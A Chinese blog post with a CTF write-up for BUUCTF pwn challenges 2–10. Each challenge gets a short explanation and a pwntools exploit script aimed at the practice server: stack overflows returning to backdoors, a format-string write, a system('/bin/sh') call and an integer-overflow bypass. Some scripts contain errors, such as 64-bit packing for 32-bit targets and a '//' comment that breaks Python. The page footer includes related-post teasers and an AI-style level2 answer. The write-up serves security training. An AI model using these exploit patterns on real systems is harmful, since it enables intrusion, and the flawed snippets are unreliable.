BUUCTF PWN wp 2-10题

BUUCTF PWN题目解析合集
原创 于 2025-12-14 17:51:13 发布 · 466 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

看前提示:

需要了解ret2text和格式化字符串漏洞

2.rip

提示:这道题涉及栈对齐问题,需要在padding后面加上一个返回地址。

很明显的栈溢出漏洞。

存在后门。

脚本如下:

from pwn import*
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote('node5.buuoj.cn',26306)
payload=b'a'*(0xf+8)+p64(0x401185)+p64(0x401186)
p.sendline(payload)
p.interactive()

3.warmup_csaw_2016

原理和上面那道题一样

脚本如下:

from pwn import*
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote('node5.buuoj.cn',28277)
payload=b'a'*(0x40+8)+p64(0x40060D)
p.sendline(payload)
p.interactive()

4.ciscn_2019_n_1

思路一:

通过v1修改v2的数值,v1和v2距离覆盖,并修改v2的数值:

from pwn import*
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote('node5.buuoj.cn',27474)
payload=b'a'*(0x30-0x4)+p64(0x41348000)
p.sendline(payload)
p.interactive()

思路二:

直接修改返回地址,

from pwn import*
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote('node5.buuoj.cn',27474)
cat=0x4006BE
payload=b'a'*(0x30+8)+p64(cat)
p.sendline(payload)
p.interactive()

5.pwn1_sctf_2016

使用了更加安全的fgets函数,限制了我们的输入长度最大为32

先看伪代码

有replace替换'I'为'you'

直接运行看看:

不难看出只要输入了'I',程序就会把它变为‘you’

这就有办法了:

虽然s数组的首地址距ebp 0x3c,如果只是输入32个字符远远不能覆盖到返回地址,但是在输入一个'I'后,程序会自动将它变为三字节的‘you’,也就是说,我们输入32个'I'就等于输入了32个'you',也就是96字节。

所以我们一共需要覆盖0x3c+4,也就是十进制的64,所以我们构造的payload就应该是:

payload=b'I'*21+b'a'

完整脚本如下:

from pwn import*
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote('node5.buuoj.cn',27598)
backdoor=0x8048F0D
payload=b'I'*21+b'a'+p64(backdoor)
p.sendline(payload)
p.interactive()

6.jarvisoj_level0

这道题和最基本的ret2text做法一样,不在赘述

from pwn import*
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote('node5.buuoj.cn',27212)
backdoor=0x400596
payload=b'I'*(0x80+8)+p64(backdoor)
p.sendline(payload)
p.interactive()

7.[第五空间2019 决赛]PWN5

先查看保护:

Canary保护开启,栈溢出就不是很好用了。

看一眼伪代码

看来并不需要我们进行覆盖到返回地址,Canary保护也就无所谓了

可以看到,程序生成了一个随机数,并将这个随机数储存到了变量buf_中(不是buf那个数组)

可以看到,这里有printf(buf)这一步,很明显的格式化字符串漏洞;

所以,我们的任务是将buf_的变量值进行修改;

第一步,查看buf_地址:双击buf_;

第二步,确定偏移量:

偏移量是10;

第三步,确定想要修改为的数值,这里不管了,直接为4;

脚本如下:

from pwn import*
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote('node5.buuoj.cn',29487)
bss=0x804C044
payload=p32(bss)+b'%10$n'
p.sendline(payload)
p.sendline(str(4))
p.interactive()

8.jarvisoj_level2

查看下字符串:

既有system函数,又有/bin/sh可以使用,所以直接拼接一下就好了。文件位数是32位的,也不用考虑寄存器问题了

脚本如下:

from pwn import*
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote('node5.buuoj.cn',27503)
system=0x8048320
binsh=0x804A024
payload=b'a'*(0x88+4)+p32(system)+p32(0xdeadbeef)+p32(binsh)//这里需要胡诌一个返回地址
p.recvuntil('Input:')
p.sendline(payload)
p.interactive()

9.ciscn_2019_n_8

这道题要通过数组来修改n17的数值,和上面一道题一样,不再赘述

脚本如下:

from pwn import*
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote('node5.buuoj.cn',27449)
payload=b'a'*0x34+p32(17)
p.sendline(payload)
p.interactive()

10.bjdctf_2020_babystack

这道题涉及到整形溢出,

 

脚本如下:

from pwn import*
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote('node5.buuoj.cn',29241)
backdoor=0x4006E6
payload=b'a'*(0x10+8)+p64(backdoor)
p.recvuntil(b'name:')
p.sendline(b'-1')
p.recvuntil(b'name?')
p.sendline(payload)
p.interactive()

当然了,不使用整形溢出也是可以的,反正源程序只是通过nbytes这个参数来限定read读入的buf的字节数,所以,如果nbytes只要大于(0x10+8)就可以了。比如100.

nuc_721_ysp
关注
BUUCTF pwn wp 116 - 120
fa1c4的blog
03-06 493
[BSidesCF 2019]Runit [BSidesCF 2019]Runit$ file runit;checksec runit runit: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=fdd5061644dc69c2e4f2a0e98091901b4
BUUCTF pwn wp 131 - 135
fa1c4的blog
04-27 687
rootersctf_2019_srop ciscn_2019_s_6 sctf_2019_easy_heap de1ctf_2019_weapon SWPUCTF_2019_p1KkHeap
BUUCTF PWN方向 1-6 详解wp
qq_62564422的博客
02-06 2675
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
BUUCTF PWN wp--[第五空间2019 决赛]PWN5
2302_81740139的博客
09-01 1121
在这个上下文中,%10$n表示写入的值将是printf的第10个参数,但由于p32(0x804C044)没有在printf调用中作为参数,它实际上利用了格式化字符串漏洞,将栈上的某个值写入到地址0x804C044。p32函数将32位整数转换为其小端序的字符串表示,这里转换的是地址0x804C044,这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量,其地址是硬编码的(例如,在ELF文件中,地址可能是一个固定的地址)。如果之前的利用成功,这将提供一个shell。
BUUCTF PWN wp--warmup_csaw_2016
2302_81740139的博客
08-19 1353
这个数组在栈帧中的位置相对于基指针ebp是偏移量-40的地方(如果ebp指向栈帧的底部),这通常意味着它是函数中的一个局部变量。PIE(Position-Independent Executable)是一种安全特性,它使得程序的代码可以在内存中的任意位置加载,这样每次程序运行时地址空间布局都是随机的,增加了利用内存损坏漏洞的难度。在函数开始执行时,如果函数要使用某些寄存器,并且这些寄存器在调用者中之后还需要使用,那么这些寄存器的值需要在栈上保存,以便在函数返回前恢复。仅为个人理解,如有错误,请指正。
BUUCTF PWN wp--pwn1_sctf_2016
2302_81740139的博客
08-26 832
PIE(Position Independent Executable)是一种安全特性,使得程序的代码可以在内存中的任意位置加载,每次加载的位置都可能不同。这里显示“No PIE”,意味着程序没有使用PIE,其代码在内存中的位置是固定的(此处为0x8048000),这使得它更容易受到攻击。operator=是std::string类的赋值运算符,将C风格的字符串char*转化为C++风格的std::string。如果v4是"you",v6是"I",则这可能是将字符串中的"you"替换为"I"。
BUUCTF pwn wp 141 - 145
fa1c4的blog
04-29 609
ciscn_2019_n_7 qctf_2018_stack2 falca@Ubuntu-2000:~/Desktop/qctf_2018_stack2$ file QCTF_2018_stack2;checksec QCTF_2018_stack2 QCTF_2018_stack2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.
BUUCTF PWN wp--ciscn_2019_n_1
2302_81740139的博客
08-25 491
得到gets缓冲区的范围大小。用垃圾数据填充v1(如上图箭头为0x30+0x8),溢出v2,覆盖到下方的system函数,转换到cat/flag的地址0x4006BE。第二步 进入主函数,发现func,main函数调用了func,func中存在经典gets()漏洞,我们看到本是v2数组在做比较。第一步 checksec,并检查该的保护机制。第三步 编写脚本。
BUUCTF pwn wp 96 - 100
fa1c4的blog
02-23 890
axb_2019_heap axb_2019_heap(master*)$ file axb_2019_heap;checksec axb_2019_heap axb_2019_heap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=bdd2a0e3
第十一篇:Day31-33 前端安全与性能监控——从“能用”到“安全可靠”(对标职场“系统稳定性”需求)
2402_87628679的博客
12-11 1190
对于小型项目或特定业务场景,可通过自定义埋点实现核心指标监控,无需接入复杂工具。// src/utils/monitor.js(自定义监控工具) import axios from 'axios';// 监控数据上报接口(后端提供) const MONITOR_UPLOAD_URL = '/api/monitor/upload';
安全审查--跨站请求伪造--双重提交Cookie模式
petunsecn的专栏
12-12 672
本文详细讲解了双重提交Cookie模式防御CSRF攻击的原理与实现。首先通过网上银行转账案例展示了CSRF攻击的危害性,解释了攻击者如何利用浏览器自动携带Cookie的特性发起恶意请求。随后深入剖析了双重提交Cookie的核心理念:利用同源策略,要求请求同时携带Cookie中的token和请求头/体中的token进行双重验证。 文章从零开始演示了实现步骤:1)服务器设置可被JavaScript读取的CSRF Token Cookie;2)前端获取Cookie中的token并添加到请求头;3)服务器验证两个t
App反诈骗:一场面向移动生态的深度安全战争(接上文短信反诈)
最新发布
xixixi7777的博客
12-12 1288
App反诈骗的最终目标是构建一个安全、可信、透明技术支柱:持续创新的检测与防御技术制度支柱:完善的法律法规与行业标准治理支柱:跨平台、跨行业的协同治理机制教育支柱:提升开发者和用户的安全意识经济支柱:建立正向激励与惩罚机制与短信反诈相比,App反诈的战场更广、链条更长、对抗更复杂。这是一场技术、法律、经济、社会的综合性战役,其成功不仅需要先进的技术手段,更需要生态系统各方的共同责任和长期投入。真正的App反诈不是简单的"查杀",而是通过纵深防御、主动狩猎、生态治理。
DNS协议安全
weixin_61562383的博客
12-12 975
许多企业的防火墙会拦截内部员工直接访问外部网站的 HTTP/TCP 连接,但通常会放行 DNS 流量,因为员工需要解析域名才能工作。阴影域名:黑客攻破了合法网站(如 example.com)的管理权,创建了恶意的子域名(如 bad.example.com)。DNS 协议在设计之初就像是在“明信片”上写字,任何人都可以拦截、修改(中间人攻击),或者伪造一张新的明信片发给你(欺骗/投毒)。:为了防止命令控制服务器(C&C)的域名被封杀,僵尸程序会内置一套算法,每天自动生成成千上万个随机域名。
AI安全威胁:对抗样本到数据隐私全解析(13种安全威胁及防护)
m0_62396717的博客
12-11 771
本文系统梳理了大模型面临的安全与隐私威胁,包括常规安全威胁(对抗样本攻击、后门攻击、投毒攻击)和新型安全威胁(内容安全、恶意使用风险、资源消耗攻击等)。同时分析了数据隐私风险(成员推断、数据提取等)和知识产权威胁(模型萃取、提示词窃取)。针对这些威胁,提出了包括对抗训练、数据清洗、差分隐私等在内的多层次防御体系,强调需要技术、法规等多角度协同应对。随着攻击手段不断演进,防御措施也需持续更新完善。
指挥中心 “协同密码”:KVM 坐席协作系统如何破解数据壁垒与安全
2409_89316373的博客
12-09 942
KVM 坐席协作系统普遍采用全 IP 或光纤架构,以分布式技术为核心支撑,通过 KVM 坐席输入节点、KVM 坐席输出节点、网络交换机(或 KVM 主机)、显示终端及一套键盘鼠标的组合部署,实现跨系统、跨设备的数据汇集管理、高效协调、实时操控、信息沟通与安全管控,最终达成 “人机分离”“一人多机” 的智能化应用模式,适配指挥中心多场景业务需求。未来,指挥中心将持续作为单位信息化建设的核心,朝着 “远程可控、现场可视、信息互链、决策智能、应用宽泛” 的方向升级,成为支撑单位高效运转的指挥中枢。
悬镜安全通过可信AI云 大模型安全扫描产品能力评估
分享软件供应链安全最新技术与最佳实践
12-09 537
在人工智能驱动的未来,安全不再是可选项,是企业生存和发展的基石。
RSA不属于安全算法吗?
SmallBull的博客
12-11 510
RSA 本身是安全的算法,“不安全” 的情况几乎都是「配置不当、实现漏洞或场景误用」导致的。在实际工作中,只要严格遵循密钥长度、实现库选择、使用场景的规范,RSA 仍是可靠的安全方案。
渗透测试行业术语扫盲(第十篇)—— 利用与提权类术语
qq_39241682的博客
12-11 887
发现漏洞只是开始,将其转化为实际的控制权才是关键。本篇聚焦渗透测试中最具技术性的核心环节:**利用**与**提权**。我们将系统学习攻击者如何将理论上的漏洞(Vulnerability)转化为实际的攻击武器(Exploit),如何获取初步的访问界面(Shell),并最终突破限制,攀登至系统权限的顶峰(Root/提权)。同时,也会涵盖为达成这些目标所需的关键支撑技术。
Windows注册表安全浅析:核心键值解析与防护策略
Bruce_xiaowei的博客
12-10 797
摘要: 本文深入解析Windows注册表的核心安全机制,重点剖析五大根键功能及恶意软件常利用的关键路径(如自启动项、LSA策略、防火墙设置等)。提供注册表加固实践方案,包括权限最小化、审计监控和防御勒索软件等具体配置。强调操作前备份、使用专业分析工具(Autoruns/Process Monitor)及应急恢复方法,提出"不懂不碰、最小权限、分层防御"的安全黄金法则。通过系统化梳理注册表攻防要点,帮助用户构建更安全的Windows环境。
buuctf pwn level2
03-29
<think>好的,我现在要解决BUUCTF PWN level2的问。首先,我需要了解目的大致情况。根据用户提供的引用内容,可能涉及到堆溢出、格式化字符串漏洞或者栈溢出等常见PWN类型。不过具体到level2,可能需要更多的信息,但用户没有提供直接的引用,所以只能根据现有的引用推测。 首先,根据引用[2]提到的栈帧建立,可能涉及栈相关的漏洞,比如栈溢出。引用[3]中的格式化字符串漏洞可能也是相关,但需要看目具体设置。而引用[4]提到沙箱机制,但不确定是否与level2相关。不过通常level2可能是一个基础,可能涉及栈溢出和ROP链的构造。 接下来,我需要回忆常见的PWN步骤。通常步骤是:检查文件保护机制(如NX、ASLR等),反编译分析漏洞点,确定利用方法,编写exp。 假设level2是一个32位程序,存在栈溢出漏洞。比如,存在一个函数如vulnerable_function,其中使用了不安全的gets函数,导致可以覆盖返回地址。目标可能是调用system函数,并传递"/bin/sh"参数。 检查保护机制:使用checksec命令查看,可能NX enabled,所以需要ROP或者已有的gadget。但如果有现成的system和/bin/sh字符串,可以直接覆盖返回地址到system,参数指向/bin/sh。 例如,在IDA中分析,可能发现存在一个buf,输入超过缓冲区大小,覆盖返回地址。然后找到system的地址,以及/bin/sh的地址(可能在程序中给出,或者需要泄露)。 比如,程序中有个函数叫system,或者libc的地址已知,可以通过溢出跳转到system,并将参数设置为/bin/sh的地址。 根据引用中的示例代码,如快速排序的Python示例,可能用户希望得到类似的详细步骤和代码。所以,我需要将思路整理成步骤,并写出对应的exp。 可能的解步骤: 1. 使用checksec查看程序保护,确认是否开启NX、Canary等。 2. 使用IDA反编译,找到漏洞函数,比如存在栈溢出的函数。 3. 确定溢出点,计算需要覆盖的偏移量。 4. 查找可利用的函数地址,如system,以及参数/bin_sh的地址。 5. 构造payload:填充垃圾数据到偏移量,然后覆盖返回地址为system,参数地址。 6. 发送payload,获取shell。 假设在level2中,程序直接提供了system函数和/bin/sh字符串,则可以直接构造payload。例如,函数返回地址覆盖为system的地址,参数指向/bin/sh。 例如,在IDA中,可能发现: - 缓冲区大小是0x88字节,而输入可以覆盖到返回地址。 - system函数地址为0x08048320 - /bin/sh字符串地址为0x0804A024 那么构造payload时,需要填充0x88 + 4字节(ebp)到返回地址的位置,然后写入system地址,之后是返回地址(可以填充任意值),再跟参数地址。 或者,如果是32位程序,调用约定是栈传参,所以构造payload为: payload = b'A'*(offset) + p32(system_addr) + p32(0) + p32(bin_sh_addr) 这样,当函数返回时,跳转到system,参数是bin_sh_addr,从而执行system("/bin/sh")。 引用中的示例exp(如引用3中的格式化字符串利用)可能结构不同,但思路类似。因此,写出对应的exp代码,使用pwntools库,连接到远程或本地程序。 可能遇到的难点是确定偏移量和正确的地址,需要动态调试。例如,使用gdb确定偏移量,或者计算缓冲区到返回地址的距离。 总结步骤: 1. 分析程序保护机制。 2. 确定漏洞类型(栈溢出)。 3. 计算偏移量。 4. 找到system和/bin/sh的地址。 5. 构造payload并攻击。 现在需要将这些步骤整理成用户需要的解思路,并给出示例exp。</think>### BUUCTF PWN level2思路 #### 1. 文件分析 首先使用`checksec`检查程序保护机制: ```bash checksec level2 ``` 通常结果为`NX enabled`(栈不可执行),需通过ROP或已有函数利用。 #### 2. 反编译分析 使用IDA打开程序,找到漏洞函数(如`vulnerable_function`): ```c int vuln() { char buf[0x88]; return gets(buf); // 栈溢出漏洞 } ``` 通过`gets`函数可覆盖返回地址。 #### 3. 计算溢出偏移 - 缓冲区大小:`0x88`字节 - 覆盖`ebp`需4字节(32位程序) - **总偏移**:`0x88 + 4 = 140`字节 #### 4. 定位关键地址 - **`system`函数地址**:通过IDA查找,如`0x08048320` - **`/bin/sh`字符串地址**:可能在程序中直接存在,如`0x0804A024` #### 5. 构造Payload 32位程序调用约定为栈传参,payload结构: ``` payload = 填充字节 + system地址 + 返回地址 + 参数地址 ``` 示例: ```python from pwn import * context(arch='i386', os='linux') system_addr = 0x08048320 bin_sh_addr = 0x0804A024 payload = b'A' * 140 # 填充至返回地址 payload += p32(system_addr) # 覆盖返回地址为system payload += p32(0xdeadbeef) # system返回地址(随意) payload += p32(bin_sh_addr) # system参数 ``` #### 6. 编写EXP ```python from pwn import * p = remote("node4.buuoj.cn", 端口号) # 替换实际端口 # p = process("./level2") # 本地测试 system_addr = 0x08048320 bin_sh_addr = 0x0804A024 payload = b'A'*140 payload += p32(system_addr) payload += p32(0) # 返回地址可省略 payload += p32(bin_sh_addr) p.sendlineafter(b"input:", payload) p.interactive() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值